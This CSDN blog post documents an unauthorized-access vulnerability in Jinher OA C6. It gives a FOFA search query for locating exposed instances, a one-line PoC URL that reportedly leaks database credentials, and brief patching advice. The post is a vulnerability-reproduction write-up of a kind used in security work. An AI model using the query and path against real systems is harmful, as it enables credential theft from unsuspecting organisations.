金和OA C6 SAP_B1Config.aspx 未授权漏洞

最新推荐文章于 2024-07-23 00:04:12 发布
最新推荐文章于 2024-07-23 00:04:12 发布
阅读量2.8k 收藏 9
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135422241
版权

产品介绍

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。

漏洞描述

金和OA C6 SAP_B1Config.aspx接口 未授权,攻击者可通过此漏洞获取数据库账户密码等敏感信息。

资产测绘

app=“Jinher-OA”
在这里插入图片描述

漏洞复现

POC:

/C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1

在这里插入图片描述

修复建议

1、升级至最新安全版本。
2、限制接口访问。

keepb1ue
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
金和OA C6 FileDownLoad.aspx 任意文件读取漏洞复现
0xSec
05-09 642
金和OA C6 FileDownLoad.aspx接口存在任意文件读取漏洞经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现】金和OA任意文件读取漏洞
晚风不及你
12-18 592
金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
漏洞复现】金和C6协同管理平台 授权访问_08
fushuang333的博客
01-04 748
漏洞复现】金和C6协同管理平台授权访问
漏洞复现-金和OA C6 GetHomeInfo SQL注入漏洞
weixin_69010236的博客
01-25 351
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统升开发平台,电子政务一体化平台智慧电商平合等服务。金和OA C6 GetHomeInfo接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 GetHomeInfo SQL注入漏洞
3tefanie丶zhou的博客
01-09 583
【真正的自由,从来不是了无牵挂。】
金和OA C6 gethomeinfo sql注入漏洞
Keepb1ue的博客
12-25 2163
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和 OA C6 gethomeinfo接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA SAP_B1Config.aspx存在授权访问漏洞
3tefanie丶zhou的博客
01-03 606
【有些话可以不说透,自欺欺人,就可以糊涂一世,打打闹闹轻轻松松。】
金和OA_C6_用户手册.pdf
03-05
金和OA_C6_用户手册,比较基本的一个介绍,适合入门级的学习以及人员培训使用。
金和OA 数据字典 c6
09-06
金和OA系统,C6数据库-数据字典,分享以供大家参考,借鉴
OA _金和C6产品白皮书
07-01
OA金和C6产品白皮书》详细解读与企业运营管理解决方案 一、产品概览:金和C6协同管理平台 《OA金和C6产品白皮书》揭示了金和C6协同管理平台的核心价值与功能特性,旨在解决企业信息化进程中遇到的多元化挑战。...
构建稳固与安全的网络环境:从微软蓝屏事件中的教训学习
xingyu_qie的专栏
07-22 579
微软蓝屏”事件为我们提供了宝贵的教训和警示,即使是最大的科技公司也难以完全避免软件缺陷带来的灾难性后果。建设一个稳固和安全的网络环境需要多方面的努力:从有效的软件更新管理到强化的紧急响应能力,再到全员安全意识的培养和文化建设。只有综合运用技术、流程和人员培训,我们才能更好地应对来可能出现的类似挑战,保护我们的数字基础设施和社会运行的稳定性与安全性。
Lianwei 安全周报|2024.07.22
联蔚盘云的博客
07-22 818
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
如何开启或者关闭 Windows 安全登录?
qq_57728300的博客
07-22 618
你知道 Windows 安全登录是什么吗?本文教你如何开启或者关闭它。
数据传输安全--IPSEC
最新发布
banliyaoguai的博客
07-23 921
默认使用IP地址作为身份标识(因为身份验证是在第五六个数据包中,但是我们在前面的几个数据包过程都需要提取预共享密钥计算,要是等身份标识的话等不下去了,所以只能看IP地址了,然后在第五六个数据包的时候再进行身份认证确认,所以这个东西也很怕NAT),这个身份标识和身份认证是不一样的,在IPSec中多使用预共享密钥进行身份认证,然后这个预共享密钥可能一个人和另外好几个人都有。注意:野蛮模式前两个数据包中的参数用来协商密钥信息,则第三个数据包可以进行加密传输,因为,身份信息是通过明文传递的,所以,安全性较低。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值